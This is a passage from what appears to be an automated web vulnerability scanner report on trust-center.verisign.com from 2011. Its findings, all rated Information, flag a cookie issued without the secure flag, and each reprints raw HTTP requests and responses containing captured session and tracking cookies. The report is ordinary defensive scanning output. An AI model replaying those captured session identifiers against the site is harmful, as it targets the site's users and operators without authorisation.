Date: Fri, 09 Sep 2011 21:47:00 GMT
Server: Apache
Set-Cookie: TLTHID=3F6ECAD8DB2D10DB52FC9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://trust-center.verisign.com/process/retail/console_home?uid=a5f0b94a4c89f47ae217b662fc5fdac5
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

6.23. https://trust-center.verisign.com/process/retail/session_timeout previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/session_timeout

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/session_timeout HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vtrh54nwcc; v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=03CA6F76DB2F10DB4BFEB1847A7DDBAF

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:59:40 GMT
Server: Apache
Set-Cookie: TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Set-Cookie: JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; Path=/; Secure
Location: http://www.verisign.com/ssl/buy-ssl-certificates/index.html
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

6.24. https://trust-center.verisign.com/process/retail/trust_initial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/trust_initial

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=62F38DA2DB2A10DB4CE59F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_initial?application_locale=VTC_US&promoCode=TSAB9999&UI=PPT HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:26:31 GMT
Server: Apache
Set-Cookie: TLTHID=62F38DA2DB2A10DB4CE59F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://trust-center.verisign.com/process/retail/trust_product_selector?uid=54e97416d385e356d49a079c459d836b&product=TRUSTSEAL001
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

6.25. https://trust-center.verisign.com/process/retail/trust_product_selector previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/trust_product_selector

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTHID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941

Response

6.26. https://trust-center.verisign.com/process/retail/trust_product_selector.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/trust_product_selector.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=40B2C62EDB2D10DB53169F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_product_selector.do HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:47:02 GMT
Server: Apache
Set-Cookie: TLTHID=40B2C62EDB2D10DB53169F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://trust-center.verisign.com/process/retail/trust_capture_tech_contact_details?uid=25a7ccba99f4ee1a587cdec832e34e73
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

6.27. https://trust-center.verisign.com/rcm/TeaLeafTarget.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/TeaLeafTarget.html

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=7A014714DB2A10DB4D2B9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /rcm/TeaLeafTarget.html HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
Content-Length: 1103
X-TeaLeaf-Page-Objects: 0
Origin: https://trust-center.verisign.com
X-TeaLeaf-Page-Img-Fail: 1
X-TeaLeaf-Page-Render: 123
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2009.11.17.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: undefined; INIT
X-TeaLeaf-Page-Url: /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719

<ClientEventSet PostTimeStamp="1315621658502" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID21H27M8S358R0.8013692023232579" TimeDuration="123" DateSince1970="1315621628481" >

...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:10 GMT
Server: Apache
Set-Cookie: TLTHID=7A014714DB2A10DB4D2B9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 32
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<html>
<body>
OK
</body>
</html>

6.28. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_gray.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/arrow_progressBar_gray.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=69374E24DB2A10DB44BAB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/arrow_progressBar_gray.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:42 GMT
Server: Apache
Set-Cookie: TLTHID=69374E24DB2A10DB44BAB1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Content-Length: 91
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a...............................!.......,.......... hs......+RR.N...}...XF.M4....1...;

6.29. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_red.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/arrow_progressBar_red.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=6931148CDB2A10DB6A89CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/arrow_progressBar_red.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:42 GMT
Server: Apache
Set-Cookie: TLTHID=6931148CDB2A10DB6A89CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Content-Length: 90
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.........3....d.....2Y........!.......,...........(e.......RR.L...}Z..XF.M4..
.M..;

6.30. https://trust-center.verisign.com/rcm/verisign/images/divider.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/divider.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=685A0CDADB2A10DB6A86CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/divider.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=685A0CDADB2A10DB6A86CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Content-Length: 44
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..
..........!.......,......
........;

6.31. https://trust-center.verisign.com/rcm/verisign/images/ico_questionmark.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/ico_questionmark.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=6778D440DB2A10DB44B3B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/ico_questionmark.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=6778D440DB2A10DB44B3B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Content-Length: 374
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.....-......8..F.#O.....I.=.2Q.Wu..:...............1Z.\}.*U..B.%K.Bh....Mn....-Q....x.....n..{..n..h}.........................x.....q...4.......................................................
...[SNIP]...

6.32. https://trust-center.verisign.com/rcm/verisign/images/logo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/logo.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/logo.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:42 GMT
Server: Apache
Set-Cookie: TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 16073
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..=...............................................................................................................................................................................................
...[SNIP]...

6.33. https://trust-center.verisign.com/rcm/verisign/images/popup_button_left.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/popup_button_left.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=6856446ADB2A10DB44B6B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/popup_button_left.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=6856446ADB2A10DB44B6B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 348
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..................................................................................................................................................................................................
...[SNIP]...

6.34. https://trust-center.verisign.com/rcm/verisign/images/popup_button_right.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/popup_button_right.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=68595EDEDB2A10DB4CFE9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/popup_button_right.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=68595EDEDB2A10DB4CFE9F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 344
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..................................................................................................................................................................................................
...[SNIP]...

6.35. https://trust-center.verisign.com/rcm/verisign/images/pricebox_bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/pricebox_bg.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=68501C2ADB2A10DB4CFB9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/pricebox_bg.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
